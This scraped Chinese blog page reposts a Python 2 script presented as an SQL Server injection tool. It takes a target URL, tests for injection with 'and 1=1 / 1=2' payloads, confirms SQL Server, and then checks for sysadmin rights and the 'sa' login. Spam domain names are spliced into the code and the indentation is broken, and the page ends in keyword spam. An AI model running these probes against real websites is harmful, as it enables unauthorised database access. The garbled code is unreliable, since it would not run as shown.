程序博客网 > 2017洗车软件app

Python编写检测数据库SA用户的方法

来源:互联网 发布:2017洗车软件app 编辑:程序博客网 时间:2024/06/05 22:36
本文讲述一个用Python写的小程序,用于有注入点的链接,以检测当前数据库用户是否为sa,详细代码如下:


# Code by zhaoxiaobu Email: little.bu@www.avcang.com
www.wnsr668.com
www.sepeizi.comhotmail.com  
#-*- coding: UTF-8 -*-  
from sys import exit  
from urllib import urlopen  
from string import join,strip  
from re import search  
 
def is_sqlable(): 
  sql1="%20and%201=2" 
  sql2="%20and%201=1" 
  urlfile1=urlopen(url+sql1) 
  urlfile2=urlopen(url+sql2) 
  htmlcodes1=urlfile1.read() 
  htmlcodes2=urlfile2.read() 
  if not search(judge,htmlcodes1) and search(judge,htmlcodes2): 
  print "[信息]恭喜!这个URL是有注入漏洞的!n" 
  print "[信息]现在判断数据库是否是SQL Server,请耐心等候....."  
  is_SQLServer() 
  else: 
  print "[错误]你确定这个URL能用?换个别的试试吧!n"
www.avcang.com
www.wnsr668.com
www.sepeizi.com

def is_SQLServer(): 
  sql = "%20and%20exists%20(select%20*%20from%20sysobjects)" 
  urlfile=urlopen(url+sql) 
  htmlcodes=urlfile.read() 
  if not search(judge,htmlcodes): 
  print "[错误]数据库好像不是SQL Server的!n" 
  else: 
  print "[信息]确认是SQL Server数据库!n" 
  print "[信息]开始检测当前数据库用户权限,请耐心等待......" 
  is_sysadmin() 
 www.avcang.com
www.wnsr668.com
www.sepeizi.com
 
def is_sysadmin():  
  sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))" 
  urlfile = urlopen(url+sql)  
  htmlcodes = urlfile.read()  
  if not search(judge,htmlcodes):  
    print "[错误]当前数据库用户不具有sysadmin权限!n" 
  else:  
    print "[信息]当前数据库用户具有sysadmin权限!n" 
    print "[信息]检测当前用户是不是SA,请耐心等待......" 
    is_sa()  
 
def is_sa():  
  sql = "%20and%20'sa'=(select%20System_user)"; 
  urlfile = urlopen(url+sql)  
  htmlcodes = urlfile.read()  www.avcang.com
www.wnsr668.com
www.sepeizi.com
  if not search(judge,htmlcodes):  
    print "[错误]当前数据库用户不是SA!n" 
  else:  
    print "[信息]当前数据库用户是SA!n" 
 
print "n########################################################################n"  
print "            ^o^SQL Server注入利用工具^o^     "  
print "           Email: little.bu@hotmail.comn"  
print "========================================================================";  
url = raw_input('[信息]请输入一个可能有注入漏洞的链接!nURL:')  
if url == '':  
  print "[错误]提供的URL必须具有 '.asp?xxx=' 这样的格式"  
  exit(1)  
 
judge = raw_input("[信息]请提供一个判断字符串.n判断字符串:")  
if judge == '':  
  print "[错误]判断字符串不能为空!"  
  exit(1)  
 
is_sqlable()
0 0
2017洗车软件app 2017洗车软件app
原创粉丝点击
热门IT博客
ubuntu增加硬盘空间ubuntu增加硬盘空间
防蹭网软件免root防蹭网软件免root
百度网盘网络连接超时
淘宝刷裁决之镰
c int数组默认值
sql server有mac版吗
数据库酒店管理系统
linux命令速查手册
mac消除开机密码
sql服务器安全策略
部落冲突天使升级数据
公司监控软件
手机录音放大软件
一厘米的距离抄袭知乎
mac地址转pin码工具
香蕉tv网络电视下载
ntfs foe mac教程
ubuntu安装cuda8.0
重度抑郁症 知乎
evasi0n7 1.0.0 mac
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 北京图书批发市场 幼儿图书批发网 人性的弱点属于什么类型的书 书的繁体 繁体书字怎么写 书字繁体书法图片 书组词 书的组词 书组词有哪些 书字组词大全 书的组词有那些 书字组词 绘画故事书 幼儿园手工绘画故事书 书绘画 书一 一书 书就 书带 恨书 药书 书- 书都 食谱书 平装书 美甲书 什么书 动物书 精品书 数字书 失眠书 手绘书 拼音书 油画书 前之书 一册书 书像什么 买书网上 书奇网电子书下载txt免费下载 买书 网上 买书 网

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里